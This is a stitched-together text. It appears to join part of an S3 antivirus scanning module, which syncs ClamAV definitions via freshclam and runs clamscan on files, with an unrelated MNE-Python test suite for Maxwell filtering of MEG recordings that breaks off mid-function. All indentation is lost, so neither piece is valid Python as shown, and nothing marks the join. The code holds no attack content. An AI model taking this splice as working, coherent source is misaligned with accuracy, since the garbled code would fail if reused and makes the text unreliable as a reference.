filename = file_prefix + "." + file_suffix
s3_path = os.path.join(AV_DEFINITION_S3_PREFIX, filename)
local_path = os.path.join(AV_DEFINITION_PATH, filename)
s3_md5 = md5_from_s3_tags(s3_client, bucket, s3_path)
s3_time = time_from_s3(s3_client, bucket, s3_path)
if s3_best_time is not None and s3_time < s3_best_time:
print("Not downloading older file in series: %s" % filename)
continue
else:
s3_best_time = s3_time
if os.path.exists(local_path) and md5_from_file(local_path) == s3_md5:
print("Not downloading %s because local md5 matches s3." % filename)
continue
if s3_md5:
to_download[file_prefix] = {
"s3_path": s3_path,
"local_path": local_path,
}
return to_download
def upload_defs_to_s3(s3_client, bucket, prefix, local_path):
for file_prefix in AV_DEFINITION_FILE_PREFIXES:
for file_suffix in AV_DEFINITION_FILE_SUFFIXES:
filename = file_prefix + "." + file_suffix
local_file_path = os.path.join(local_path, filename)
if os.path.exists(local_file_path):
local_file_md5 = md5_from_file(local_file_path)
if local_file_md5 != md5_from_s3_tags(
s3_client, bucket, os.path.join(prefix, filename)
):
print(
"Uploading %s to s3://%s"
% (local_file_path, os.path.join(bucket, prefix, filename))
)
s3 = boto3.resource("s3", endpoint_url=S3_ENDPOINT)
s3_object = s3.Object(bucket, os.path.join(prefix, filename))
s3_object.upload_file(os.path.join(local_path, filename))
s3_client.put_object_tagging(
Bucket=s3_object.bucket_name,
Key=s3_object.key,
Tagging={"TagSet": [{"Key": "md5", "Value": local_file_md5}]},
)
else:
print(
"Not uploading %s because md5 on remote matches local."
% filename
)
else:
print("File does not exist: %s" % filename)
def update_defs_from_freshclam(path, library_path=""):
create_dir(path)
fc_env = os.environ.copy()
if library_path:
fc_env["LD_LIBRARY_PATH"] = "%s:%s" % (
":".join(current_library_search_path()),
CLAMAVLIB_PATH,
)
print("Starting freshclam with defs in %s." % path)
fc_proc = subprocess.Popen(
[
FRESHCLAM_PATH,
"--config-file=./bin/freshclam.conf",
"-u %s" % pwd.getpwuid(os.getuid())[0],
"--datadir=%s" % path,
],
stderr=subprocess.STDOUT,
stdout=subprocess.PIPE,
env=fc_env,
)
output = fc_proc.communicate()[0]
print("freshclam output:\n%s" % output)
if fc_proc.returncode != 0:
print("Unexpected exit code from freshclam: %s." % fc_proc.returncode)
return fc_proc.returncode
def md5_from_file(filename):
hash_md5 = hashlib.md5()
with open(filename, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
return hash_md5.hexdigest()
def md5_from_s3_tags(s3_client, bucket, key):
try:
tags = s3_client.get_object_tagging(Bucket=bucket, Key=key)["TagSet"]
except botocore.exceptions.ClientError as e:
expected_errors = {
"404", # Object does not exist
"AccessDenied", # Object cannot be accessed
"NoSuchKey", # Object does not exist
"MethodNotAllowed", # Object deleted in bucket with versioning
}
if e.response["Error"]["Code"] in expected_errors:
return ""
else:
raise
for tag in tags:
if tag["Key"] == "md5":
return tag["Value"]
return ""
def time_from_s3(s3_client, bucket, key):
try:
time = s3_client.head_object(Bucket=bucket, Key=key)["LastModified"]
except botocore.exceptions.ClientError as e:
expected_errors = {"404", "AccessDenied", "NoSuchKey"}
if e.response["Error"]["Code"] in expected_errors:
return datetime.datetime.fromtimestamp(0, utc)
else:
raise
return time
# Turn ClamAV Scan output into a JSON formatted data object
def scan_output_to_json(output):
summary = {}
for line in output.split("\n"):
if ":" in line:
key, value = line.split(":", 1)
summary[key] = value.strip()
return summary
def scan_file(path):
av_env = os.environ.copy()
av_env["LD_LIBRARY_PATH"] = CLAMAVLIB_PATH
print("Starting clamscan of %s." % path)
av_proc = subprocess.Popen(
[CLAMSCAN_PATH, "-v", "-a", "--stdout", "-d", AV_DEFINITION_PATH, path],
stderr=subprocess.STDOUT,
stdout=subprocess.PIPE,
env=av_env,
)
output = av_proc.communicate()[0].decode()
print("clamscan output:\n%s" % output)
# Turn the output into a data source we can read
summary = scan_output_to_json(output)
if av_proc.returncode == 0:
return AV_STATUS_CLEAN, AV_SIGNATURE_OK
elif av_proc.returncode == 1:
signature = summary.get(path, AV_SIGNATURE_UNKNOWN)
return AV_STATUS_INFECTED, signature
else:
msg = "Unexpected exit code from clamscan: %s.\n" % av_proc.returncode
print(msg)
raise Exception(msg)
|
|
# Author: Mark Wronkiewicz <wronk@uw.edu>
#
# License: BSD (3-clause)
import os.path as op
import warnings
import numpy as np
import sys
import scipy
from numpy.testing import assert_equal, assert_allclose
from nose.tools import assert_true, assert_raises
from nose.plugins.skip import SkipTest
from distutils.version import LooseVersion
from mne import compute_raw_covariance, pick_types
from mne.chpi import read_head_pos, filter_chpi
from mne.forward import _prep_meg_channels
from mne.cov import _estimate_rank_meeg_cov
from mne.datasets import testing
from mne.io import Raw, proc_history, read_info, read_raw_bti, read_raw_kit
from mne.preprocessing.maxwell import (
maxwell_filter, _get_n_moments, _sss_basis_basic, _sh_complex_to_real,
_sh_real_to_complex, _sh_negate, _bases_complex_to_real, _trans_sss_basis,
_bases_real_to_complex, _sph_harm, _prep_mf_coils)
from mne.tests.common import assert_meg_snr
from mne.utils import (_TempDir, run_tests_if_main, slow_test, catch_logging,
requires_version, object_diff)
from mne.externals.six import PY3
warnings.simplefilter('always') # Always throw warnings
data_path = testing.data_path(download=False)
sss_path = op.join(data_path, 'SSS')
pre = op.join(sss_path, 'test_move_anon_')
raw_fname = pre + 'raw.fif'
sss_std_fname = pre + 'stdOrigin_raw_sss.fif'
sss_nonstd_fname = pre + 'nonStdOrigin_raw_sss.fif'
sss_bad_recon_fname = pre + 'badRecon_raw_sss.fif'
sss_reg_in_fname = pre + 'regIn_raw_sss.fif'
sss_fine_cal_fname = pre + 'fineCal_raw_sss.fif'
sss_ctc_fname = pre + 'crossTalk_raw_sss.fif'
sss_trans_default_fname = pre + 'transDefault_raw_sss.fif'
sss_trans_sample_fname = pre + 'transSample_raw_sss.fif'
sss_st1FineCalCrossTalkRegIn_fname = \
pre + 'st1FineCalCrossTalkRegIn_raw_sss.fif'
sss_st1FineCalCrossTalkRegInTransSample_fname = \
pre + 'st1FineCalCrossTalkRegInTransSample_raw_sss.fif'
sss_movecomp_fname = pre + 'movecomp_raw_sss.fif'
sss_movecomp_reg_in_fname = pre + 'movecomp_regIn_raw_sss.fif'
sss_movecomp_reg_in_st4s_fname = pre + 'movecomp_regIn_st4s_raw_sss.fif'
erm_fname = pre + 'erm_raw.fif'
sss_erm_std_fname = pre + 'erm_devOrigin_raw_sss.fif'
sss_erm_reg_in_fname = pre + 'erm_regIn_raw_sss.fif'
sss_erm_fine_cal_fname = pre + 'erm_fineCal_raw_sss.fif'
sss_erm_ctc_fname = pre + 'erm_crossTalk_raw_sss.fif'
sss_erm_st_fname = pre + 'erm_st1_raw_sss.fif'
sss_erm_st1FineCalCrossTalk_fname = pre + 'erm_st1FineCalCrossTalk_raw_sss.fif'
sss_erm_st1FineCalCrossTalkRegIn_fname = \
pre + 'erm_st1FineCalCrossTalkRegIn_raw_sss.fif'
sample_fname = op.join(data_path, 'MEG', 'sample_audvis_trunc_raw.fif')
sss_samp_reg_in_fname = op.join(data_path, 'SSS',
'sample_audvis_trunc_regIn_raw_sss.fif')
sss_samp_fname = op.join(data_path, 'SSS', 'sample_audvis_trunc_raw_sss.fif')
pos_fname = op.join(data_path, 'SSS', 'test_move_anon_raw.pos')
bases_fname = op.join(sss_path, 'sss_data.mat')
fine_cal_fname = op.join(sss_path, 'sss_cal_3053.dat')
fine_cal_fname_3d = op.join(sss_path, 'sss_cal_3053_3d.dat')
ctc_fname = op.join(sss_path, 'ct_sparse.fif')
fine_cal_mgh_fname = op.join(sss_path, 'sss_cal_mgh.dat')
ctc_mgh_fname = op.join(sss_path, 'ct_sparse_mgh.fif')
sample_fname = op.join(data_path, 'MEG', 'sample',
'sample_audvis_trunc_raw.fif')
triux_path = op.join(data_path, 'SSS', 'TRIUX')
tri_fname = op.join(triux_path, 'triux_bmlhus_erm_raw.fif')
tri_sss_fname = op.join(triux_path, 'triux_bmlhus_erm_raw_sss.fif')
tri_sss_reg_fname = op.join(triux_path, 'triux_bmlhus_erm_regIn_raw_sss.fif')
tri_sss_st4_fname = op.join(triux_path, 'triux_bmlhus_erm_st4_raw_sss.fif')
tri_sss_ctc_fname = op.join(triux_path, 'triux_bmlhus_erm_ctc_raw_sss.fif')
tri_sss_cal_fname = op.join(triux_path, 'triux_bmlhus_erm_cal_raw_sss.fif')
tri_sss_ctc_cal_fname = op.join(
triux_path, 'triux_bmlhus_erm_ctc_cal_raw_sss.fif')
tri_sss_ctc_cal_reg_in_fname = op.join(
triux_path, 'triux_bmlhus_erm_ctc_cal_regIn_raw_sss.fif')
tri_ctc_fname = op.join(triux_path, 'ct_sparse_BMLHUS.fif')
tri_cal_fname = op.join(triux_path, 'sss_cal_BMLHUS.dat')
io_dir = op.join(op.dirname(__file__), '..', '..', 'io')
fname_ctf_raw = op.join(io_dir, 'tests', 'data', 'test_ctf_comp_raw.fif')
int_order, ext_order = 8, 3
mf_head_origin = (0., 0., 0.04)
mf_meg_origin = (0., 0.013, -0.006)
# otherwise we can get SVD error
requires_svd_convergence = requires_version('scipy', '0.12')
# 30 random bad MEG channels (20 grad, 10 mag) that were used in generation
bads = ['MEG0912', 'MEG1722', 'MEG2213', 'MEG0132', 'MEG1312', 'MEG0432',
'MEG2433', 'MEG1022', 'MEG0442', 'MEG2332', 'MEG0633', 'MEG1043',
'MEG1713', 'MEG0422', 'MEG0932', 'MEG1622', 'MEG1343', 'MEG0943',
'MEG0643', 'MEG0143', 'MEG2142', 'MEG0813', 'MEG2143', 'MEG1323',
'MEG0522', 'MEG1123', 'MEG0423', 'MEG2122', 'MEG2532', 'MEG0812']
def _assert_n_free(raw_sss, lower, upper=None):
"""Helper to check the DOF"""
upper = lower if upper is None else upper
n_free = raw_sss.info['proc_history'][0]['max_info']['sss_info']['nfree']
assert_true(lower <= n_free <= upper,
'nfree fail: %s <= %s <= %s' % (lower, n_free, upper))
@slow_test
@testing.requires_testing_data
def test_movement_compensation():
"""Test movement compensation"""
temp_dir = _TempDir()
lims = (0, 4, False)
raw = Raw(raw_fname, allow_maxshield='yes', preload=True).crop(*lims)
head_pos = read_head_pos(pos_fname)
#
# Movement compensation, no regularization, no tSSS
#
raw_sss = maxwell_filter(raw, head_pos=head_pos, origin=mf_head_origin,
regularize=None, bad_condition='ignore')
assert_meg_snr(raw_sss, Raw(sss_movecomp_fname).crop(*lims),
4.6, 12.4, chpi_med_tol=58)
# IO
temp_fname = op.join(temp_dir, 'test_raw_sss.fif')
raw_sss.save(temp_fname)
raw_sss = Raw(temp_fname)
assert_meg_snr(raw_sss, Raw(sss_movecomp_fname).crop(*lims),
4.6, 12.4, chpi_med_tol=58)
#
# Movement compensation, regularization, no tSSS
#
raw_sss = maxwell_filter(raw, head_pos=head_pos, origin=mf_head_origin)
assert_meg_snr(raw_sss, Raw(sss_movecomp_reg_in_fname).crop(*lims),
0.5, 1.9, chpi_med_tol=121)
#
# Movement compensation, regularization, tSSS at the end
#
raw_nohpi = filter_chpi(raw.copy())
with warnings.catch_warnings(record=True) as w: # untested feature
raw_sss_mv = maxwell_filter(raw_nohpi, head_pos=head_pos,
st_duration=4., origin=mf_head_origin,
st_fixed=False)
assert_equal(len(w), 1)
assert_true('is untested' in str(w[0].message))
# Neither match is particularly good because our algorithm actually differs
assert_meg_snr(raw_sss_mv, Raw(sss_movecomp_reg_in_st4s_fname).crop(*lims),
0.6, 1.3)
tSSS_fname = op.join(sss_path, 'test_move_anon_st4s_raw_sss.fif')
assert_meg_snr(raw_sss_mv, Raw(tSSS_fname).crop(*lims),
0.6, 1.0, chpi_med_tol=None)
assert_meg_snr(Raw(sss_movecomp_reg_in_st4s_fname), Raw(tSSS_fname),
0.8, 1.0, chpi_med_tol=None)
#
# Movement compensation, regularization, tSSS at the beginning
#
raw_sss_mc = maxwell_filter(raw_nohpi, head_pos=head_pos, st_duration=4.,
origin=mf_head_origin)
assert_meg_snr(raw_sss_mc, Raw(tSSS_fname).crop(*lims),
0.6, 1.0, chpi_med_tol=None)
assert_meg_snr(raw_sss_mc, raw_sss_mv, 0.6, 1.4)
# some degenerate cases
raw_erm = Raw(erm_fname, allow_maxshield='yes')
assert_raises(ValueError, maxwell_filter, raw_erm, coord_frame='meg',
head_pos=head_pos) # can't do ERM file
assert_raises(ValueError, maxwell_filter, raw,
head_pos=head_pos[:, :9]) # bad shape
assert_raises(TypeError, maxwell_filter, raw, head_pos='foo') # bad type
assert_raises(ValueError, maxwell_filter, raw, head_pos=head_pos[::-1])
head_pos_bad = head_pos.copy()
head_pos_bad[0, 0] = raw.first_samp / raw.info['sfreq'] - 1e-2
assert_raises(ValueError, maxwell_filter, raw, head_pos=head_pos_bad)
# make sure numerical error doesn't screw it up, though
head_pos_bad[0, 0] = raw.first_samp / raw.info['sfreq'] - 5e-4
raw_sss_tweak = maxwell_filter(raw, head_pos=head_pos_bad,
origin=mf_head_origin)
assert_meg_snr(raw_sss_tweak, raw_sss, 2., 10., chpi_med_tol=11)
@slow_test
def test_other_systems():
"""Test Maxwell filtering on KIT, BTI, and CTF files
"""
# KIT
kit_dir = op.join(io_dir, 'kit', 'tests', 'data')
sqd_path = op.join(kit_dir, 'test.sqd')
mrk_path = op.join(kit_dir, 'test_mrk.sqd')
elp_path = op.join(kit_dir, 'test_elp.txt')
hsp_path = op.join(kit_dir, 'test_hsp.txt')
raw_kit = read_raw_kit(sqd_path, mrk_path, elp_path, hsp_path)
with warnings.catch_warnings(record=True): # head fit
assert_raises(RuntimeError, maxwell_filter, raw_kit)
raw_sss = maxwell_filter(raw_kit, origin=(0., 0., 0.04), ignore_ref=True)
_assert_n_free(raw_sss, 65, 65)
# XXX this KIT origin fit is terrible! Eventually we should get a
# corrected HSP file with proper coverage
with warnings.catch_warnings(record=True):
with catch_logging() as log_file:
assert_raises(RuntimeError, maxwell_filter, raw_kit,
ignore_ref=True, regularize=None) # bad condition
raw_sss = maxwell_filter(raw_kit, origin='auto',
ignore_ref=True, bad_condition='warning',
verbose='warning')
log_file = log_file.getvalue()
assert_true('badly conditioned' in log_file)
assert_true('more than 20 mm from' in log_file)
# fits can differ slightly based on scipy version, so be lenient here
_assert_n_free(raw_sss, 28, 34) # bad origin == brutal reg
# Let's set the origin
with warnings.catch_warnings(record=True):
with catch_logging() as log_file:
raw_sss = maxwell_filter(raw_kit, origin=(0., 0., 0.04),
ignore_ref=True, bad_condition='warning',
regularize=None, verbose='warning')
log_file = log_file.getvalue()
assert_true('badly conditioned' in log_file)
_assert_n_free(raw_sss, 80)
# Now with reg
with warnings.catch_warnings(record=True):
with catch_logging() as log_file:
raw_sss = maxwell_filter(raw_kit, origin=(0., 0., 0.04),
ignore_ref=True, verbose=True)
log_file = log_file.getvalue()
assert_true('badly conditioned' not in log_file)
_assert_n_free(raw_sss, 65)
# BTi
bti_dir = op.join(io_dir, 'bti', 'tests', 'data')
bti_pdf = op.join(bti_dir, 'test_pdf_linux')
bti_config = op.join(bti_dir, 'test_config_linux')
bti_hs = op.join(bti_dir, 'test_hs_linux')
with warnings.catch_warnings(record=True): # weght table
raw_bti = read_raw_bti(bti_pdf, bti_config, bti_hs, preload=False)
raw_sss = maxwell_filter(raw_bti)
_assert_n_free(raw_sss, 70)
# CTF
raw_ctf = Raw(fname_ctf_raw, compensation=2)
assert_raises(RuntimeError, maxwell_filter, raw_ctf) # compensated
raw_ctf = Raw(fname_ctf_raw)
assert_raises(ValueError, maxwell_filter, raw_ctf) # cannot fit headshape
raw_sss = maxwell_filter(raw_ctf, origin=(0., 0., 0.04))
_assert_n_free(raw_sss, 68)
raw_sss = maxwell_filter(raw_ctf, origin=(0., 0., 0.04), ignore_ref=True)
_assert_n_free(raw_sss, 70)
def test_spherical_harmonics():
"""Test spherical harmonic functions"""
from scipy.special import sph_harm
az, pol = np.meshgrid(np.linspace(0, 2 * np.pi, 30),
np.linspace(0, np.pi, 20))
# As of Oct 16, 2015, Anancoda has a bug in scipy due to old compilers (?):
# https://github.com/ContinuumIO/anaconda-issues/issues/479
if (PY3 and
LooseVersion(scipy.__version__) >= LooseVersion('0.15') and
'Continuum Analytics' in sys.version):
raise SkipTest('scipy sph_harm bad in Py3k on Anaconda')
# Test our basic spherical harmonics
for degree in range(1, int_order):
for order in range(0, degree + 1):
sph = _sph_harm(order, degree, az, pol)
sph_scipy = sph_harm(order, degree, az, pol)
assert_allclose(sph, sph_scipy, atol=1e-7)
def test_spherical_conversions():
"""Test spherical harmonic conversions"""
# Test our real<->complex conversion functions
az, pol = np.meshgrid(np.linspace(0, 2 * np.pi, 30),
np.linspace(0, np.pi, 20))
for degree in range(1, int_order):
for order in range(0, degree + 1):
sph = _sph_harm(order, degree, az, pol)
# ensure that we satisfy the conjugation property
assert_allclose(_sh_negate(sph, order),
_sph_harm(-order, degree, az, pol))
# ensure our conversion functions work
sph_real_pos = _sh_complex_to_real(sph, order)
sph_real_neg = _sh_complex_to_real(sph, -order)
sph_2 = _sh_real_to_complex([sph_real_pos, sph_real_neg], order)
assert_allclose(sph, sph_2, atol=1e-7)
@testing.requires_testing_data
def test_multipolar_bases():
"""Test multipolar moment basis calculation using sensor information"""
from scipy.io import loadmat
# Test our basis calculations
info = read_info(raw_fname)
coils = _prep_meg_channels(info, accurate=True, elekta_defs=True,
do_es=True)[0]
# Check against a known benchmark
sss_data = loadmat(bases_fname)
exp = dict(int_order=int_order, ext_order=ext_order)
for origin in ((0, 0, 0.04), (0, 0.02, 0.02)):
o_str = ''.join('%d' % (1000 * n) for n in origin)
exp.update(origin=origin)
S_tot = _sss_basis_basic(exp, coils, method='alternative')
# Test our real<->complex conversion functions
S_tot_complex = _bases_real_to_complex(S_tot, int_order, ext_order)
S_tot_round = _bases_complex_to_real(S_tot_complex,
int_order, ext_order)
assert_allclose(S_tot, S_tot_round, atol=1e-7)
S_tot_mat = np.concatenate([sss_data['Sin' + o_str],
sss_data['Sout' + o_str]], axis=1)
S_tot_mat_real = _bases_complex_to_real(S_tot_mat,
int_order, ext_order)
S_tot_mat_round = _bases_real_to_complex(S_tot_mat_real,
int_order, ext_order)
assert_allclose(S_tot_mat, S_tot_mat_round, atol=1e-7)
assert_allclose(S_tot_complex, S_tot_mat, rtol=1e-4, atol=1e-8)
assert_allclose(S_tot, S_tot_mat_real, rtol=1e-4, atol=1e-8)
# Now normalize our columns
S_tot /= np.sqrt(np.sum(S_tot * S_tot, axis=0))[np.newaxis]
S_tot_complex /= np.sqrt(np.sum(
(S_tot_complex * S_tot_complex.conj()).real, axis=0))[np.newaxis]
# Check against a known benchmark
S_tot_mat = np.concatenate([sss_data['SNin' + o_str],
sss_data['SNout' + o_str]], axis=1)
# Check this roundtrip
S_tot_mat_real = _bases_complex_to_real(S_tot_mat,
int_order, ext_order)
S_tot_mat_round = _bases_real_to_complex(S_tot_mat_real,
int_order, ext_order)
assert_allclose(S_tot_mat, S_tot_mat_round, atol=1e-7)
assert_allclose(S_tot_complex, S_tot_mat, rtol=1e-4, atol=1e-8)
# Now test our optimized version
S_tot = _sss_basis_basic(exp, coils)
S_tot_fast = _trans_sss_basis(
exp, all_coils=_prep_mf_coils(info), trans=info['dev_head_t'])
# there are some sign differences for columns (order/degrees)
# in here, likely due to Condon-Shortley. Here we use a
# Magnetometer channel to figure out the flips because the
# gradiometer channels have effectively zero values for first three
# external components (i.e., S_tot[grad_picks, 80:83])
flips = (np.sign(S_tot_fast[2]) != np.sign(S_tot[2]))
flips = 1 - 2 * flips
assert_allclose(S_tot, S_tot_fast * flips, atol=1e-16)
@testing.requires_testing_data
def test_basic():
"""Test Maxwell filter basic version"""
# Load testing data (raw, SSS std origin, SSS non-standard origin)
raw = Raw(raw_fname, allow_maxshield='yes').crop(0., 1., copy=False)
raw_err = Raw(raw_fname, proj=True, allow_maxshield='yes')
raw_erm = Raw(erm_fname, allow_maxshield='yes')
assert_raises(RuntimeError, maxwell_filter, raw_err)
assert_raises(TypeError, maxwell_filter, 1.) # not a raw
assert_raises(ValueError, maxwell_filter, raw, int_order=20) # too many
n_int_bases = int_order ** 2 + 2 * int_order
n_ext_bases = ext_order ** 2 + 2 * ext_order
nbases = n_int_bases + n_ext_bases
# Check number of bases computed correctly
assert_equal(_get_n_moments([int_order, ext_order]).sum(), nbases)
# Test SSS computation at the standard head origin
assert_equal(len(raw.info['projs']), 12) # 11 MEG projs + 1 AVG EEG
raw_sss = maxwell_filter(raw, origin=mf_head_origin, regularize=None,
bad_condition='ignore')
assert_equal(len(raw_sss.info['projs']), 1) # avg EEG
assert_equal(raw_sss.info['projs'][0]['desc'], 'Average EEG reference')
assert_meg_snr(raw_sss, Raw(sss_std_fname), 200., 1000.)
py_cal = raw_sss.info['proc_history'][0]['max_info']['sss_cal']
assert_equal(len(py_cal), 0)
py_ctc = raw_sss.info['proc_history'][0]['max_info']['sss_ctc']
assert_equal(len(py_ctc), 0)
py_st = raw_sss.info['proc_history'][0]['max_info']['max_st']
assert_equal(len(py_st), 0)
assert_raises(RuntimeError, maxwell_filter, raw_sss)
# Test SSS computation at non-standard head origin
raw_sss = maxwell_filter(raw, origin=[0., 0.02, 0.02], regularize=None,
bad_condition='ignore')
assert_meg_snr(raw_sss, Raw(sss_nonstd_fname), 250., 700.)
# Test SSS computation at device origin
sss_erm_std = Raw(sss_erm_std_fname)
raw_sss = maxwell_filter(raw_erm, coord_frame='meg',
origin=mf_meg_origin, regularize=None,
bad_condition='ignore')
assert_meg_snr(raw_sss, sss_erm_std, 100., 900.)
for key in ('job', 'frame'):
vals = [x.info['proc_history'][0]['max_info']['sss_info'][key]
for x in [raw_sss, sss_erm_std]]
assert_equal(vals[0], vals[1])
# Check against SSS functions from proc_history
sss_info = raw_sss.info['proc_history'][0]['max_info']
assert_equal(_get_n_moments(int_order),
proc_history._get_sss_rank(sss_info))
# Degenerate cases
raw_bad = raw.copy()
raw_bad.comp = True
assert_raises(RuntimeError, maxwell_filter, raw_bad)
del raw_bad
assert_raises(ValueError, maxwell_filter, raw, coord_frame='foo')
assert_raises(ValueError, maxwell_filter, raw, origin='foo')
assert_raises(ValueError, maxwell_filter, raw, origin=[0] * 4)
@testing.requires_testing_data
def test_maxwell_filter_additional():
"""Test processing of Maxwell filtered data"""
# TODO: Future tests integrate with mne/io/tests/test_proc_history
# Load testing data (raw, SSS std origin, SSS non-standard origin)
data_path = op.join(testing.data_path(download=False))
file_name = 'test_move_anon'
raw_fname = op.join(data_path, 'SSS', file_name + '_raw.fif')
# Use 2.0 seconds of data to get stable cov. estimate
raw = Raw(raw_fname, allow_maxshield='yes').crop(0., 2., copy=False)
# Get MEG channels, compute Maxwell filtered data
raw.load_data()
raw.pick_types(meg=True, eeg=False)
int_order = 8
raw_sss = maxwell_filter(raw, origin=mf_head_origin, regularize=None,
bad_condition='ignore')
# Test io on processed data
tempdir = _TempDir()
test_outname = op.join(tempdir, 'test_raw_sss.fif')
raw_sss.save(test_outname)
raw_sss_loaded = Raw(test_outname, preload=True)
# Some numerical imprecision since save uses 'single' fmt
assert_allclose(raw_sss_loaded[:][0], raw_sss[:][0],
rtol=1e-6, atol=1e-20)
# Test rank of covariance matrices for raw and SSS processed data
cov_raw = compute_raw_covariance(raw)
cov_sss = compute_raw_covariance(raw_sss)
scalings = None
cov_raw_rank = _estimate_rank_meeg_cov(cov_raw['data'], raw.info, scalings)
cov_sss_rank = _estimate_rank_meeg_cov(cov_sss['data'], raw_sss.info,
scalings)
assert_equal(cov_raw_rank, raw.info['nchan'])
assert_equal(cov_sss_rank, _get_n_moments(int_order))
@slow_test
@testing.requires_testing_data
def test_bads_reconstruction():
"""Test Maxwell filter reconstruction of bad channels"""
raw = Raw(raw_fname, allow_maxshield='yes').crop(0., 1.)
raw.info['bads'] = bads
raw_sss = maxwell_filter(raw, origin=mf_head_origin, regularize=None,
bad_condition='ignore')
assert_meg_snr(raw_sss, Raw(sss_bad_recon_fname), 300.)
@requires_svd_convergence
@testing.requires_testing_data
def test_spatiotemporal_maxwell():
"""Test Maxwell filter (tSSS) spatiotemporal processing"""
# Load raw testing data
raw = Raw(raw_fname, allow_maxshield='yes')
# Test that window is less than length of data
assert_raises(ValueError, maxwell_filter, raw, st_duration=1000.)
# Check both 4 and 10 seconds because Elekta handles them differently
# This is to ensure that std/non-std tSSS windows are correctly handled
st_durations = [4., 10.]
tols = [325., 200.]
for st_duration, tol in zip(st_durations, tols):
# Load tSSS data depending on st_duration and get data
tSSS_fname = op.join(sss_path,
'test_move_anon_st%0ds_raw_sss.fif' % st_duration)
tsss_bench = Raw(tSSS_fname)
# Because Elekta's tSSS sometimes(!) lumps the tail window of data
# onto the previous buffer if it's shorter than st_duration, we have to
# crop the data here to compensate for Elekta's tSSS behavior.
if st_duration == 10.:
tsss_bench.crop(0, st_duration, copy=False)
# Test sss computation at the standard head origin. Same cropping issue
# as mentioned above.
if st_duration == 10.:
raw_tsss = maxwell_filter(raw.crop(0, st_duration),
origin=mf_head_origin,
st_duration=st_duration, regularize=None,
bad_condition='ignore')
else:
raw_tsss = maxwell_filter(raw, st_duration=st_duration,
origin=mf_head_origin, regularize=None,
bad_condition='ignore', verbose=True)
raw_tsss_2 = maxwell_filter(raw, st_duration=st_duration,
origin=mf_head_origin, regularize=None,
bad_condition='ignore', st_fixed=False,
verbose=True)
assert_meg_snr(raw_tsss, raw_tsss_2, 100., 1000.)
assert_equal(raw_tsss.estimate_rank(), 140)
assert_equal(raw_tsss_2.estimate_rank(), 140)
assert_meg_snr(raw_tsss, tsss_bench, tol)
py_st = raw_tsss.info['proc_history'][0]['max_info']['max_st']
assert_true(len(py_st) > 0)
assert_equal(py_st['buflen'], st_duration)
assert_equal(py_st['subspcorr'], 0.98)
# Degenerate cases
assert_raises(ValueError, maxwell_filter, raw, st_duration=10.,
st_correlation=0.)
@requires_svd_convergence
@testing.requires_testing_data
def test_spatiotemporal_only():
"""Test tSSS-only processing"""
# Load raw testing data
raw = Raw(raw_fname,
allow_maxshield='yes').crop(0, 2, copy=False).load_data()
picks = pick_types(raw.info, meg='mag', exclude=())
power = np.sqrt(np.sum(raw[picks][0] ** 2))
# basics
raw_tsss = maxwell_filter(raw, st_duration=1., st_only=True)
assert_equal(raw_tsss.estimate_rank(), 366)
_assert_shielding(raw_tsss, power, 10)
# temporal proj will actually reduce spatial DOF with small windows!
raw_tsss = maxwell_filter(raw, st_duration=0.1, st_only=True)
assert_true(raw_tsss.estimate_rank() < 350)
_assert_shielding(raw_tsss, power, 40)
# with movement
head_pos = read_head_pos(pos_fname)
raw_tsss = maxwell_filter(raw, st_duration=1., st_only=True,
head_pos=head_pos)
assert_equal(raw_tsss.estimate_rank(), 366)
_assert_shielding(raw_tsss, power, 12)
with warnings.catch_warnings(record=True): # st_fixed False
raw_tsss = maxwell_filter(raw, st_duration=1., st_only=True,
head_pos=head_pos, st_fixed=False)
assert_equal(raw_tsss.estimate_rank(), 366)
_assert_shielding(raw_tsss, power, 12)
# should do nothing
raw_tsss = maxwell_filter(raw, st_duration=1., st_correlation=1.,
st_only=True)
assert_allclose(raw[:][0], raw_tsss[:][0])
# degenerate
assert_raises(ValueError, maxwell_filter, raw, st_only=True) # no ST
# two-step process equivalent to single-step process
raw_tsss = maxwell_filter(raw, st_duration=1., st_only=True)
raw_tsss = maxwell_filter(raw_tsss)
raw_tsss_2 = maxwell_filter(raw, st_duration=1.)
assert_meg_snr(raw_tsss, raw_tsss_2, 1e5)
# now also with head movement, and a bad MEG channel
assert_equal(len(raw.info['bads']), 0)
raw.info['bads'] = ['EEG001', 'MEG2623']
raw_tsss = maxwell_filter(raw, st_duration=1., st_only=True,
head_pos=head_pos)
assert_equal(raw.info['bads'], ['EEG001', 'MEG2623'])
assert_equal(raw_tsss.info['bads'], ['EEG001', 'MEG2623']) # don't reset
raw_tsss = maxwell_filter(raw_tsss, head_pos=head_pos)
assert_equal(raw_tsss.info['bads'], ['EEG001']) # do reset MEG bads
raw_tsss_2 = maxwell_filter(raw, st_duration=1., head_pos=head_pos)
assert_equal(raw_tsss_2.info['bads'], ['EEG001'])
assert_meg_snr(raw_tsss, raw_tsss_2, 1e5)
@testing.requires_testing_data
def test_fine_calibration():
"""Test Maxwell filter fine calibration"""
# Load testing data (raw, SSS std origin, SSS non-standard origin)
raw = Raw(raw_fname, allow_maxshield='yes').crop(0., 1., copy=False)
sss_fine_cal = Raw(sss_fine_cal_fname)
# Test 1D SSS fine calibration
raw_sss = maxwell_filter(raw, calibration=fine_cal_fname,
origin=mf_head_origin, regularize=None,
bad_condition='ignore')
assert_meg_snr(raw_sss, sss_fine_cal, 82, 611)
py_cal = raw_sss.info['proc_history'][0]['max_info']['sss_cal']
assert_true(py_cal is not None)
assert_true(len(py_cal) > 0)
mf_cal = sss_fine_cal.info['proc_history'][0]['max_info']['sss_cal']
# we identify these differently
mf_cal['cal_chans'][mf_cal['cal_chans'][:, 1] == 3022, 1] = 3024
assert_allclose(py_cal['cal_chans'], mf_cal['cal_chans'])
assert_allclose(py_cal['cal_corrs'], mf_cal['cal_corrs'],
rtol=1e-3, atol=1e-3)
# Test 3D SSS fine calibration (no equivalent func in MaxFilter yet!)
# very low SNR as proc differs, eventually we should add a better test
raw_sss_3D = maxwell_filter(raw, calibration=fine_cal_fname_3d,
origin=mf_head_origin, regularize=None,
bad_condition='ignore')
assert_meg_snr(raw_sss_3D, sss_fine_cal, 1.0, 6.)
raw_ctf = Raw(fname_ctf_raw)
assert_raises(RuntimeError, maxwell_filter, raw_ctf, origin=(0., 0., 0.04),
calibration=fine_cal_fname)
@slow_test
@testing.requires_testing_data
def test_regularization():
"""Test Maxwell filter regularization"""
# Load testing data (raw, SSS std origin, SSS non-standard origin)
min_tols = (100., 2.6, 1.0)
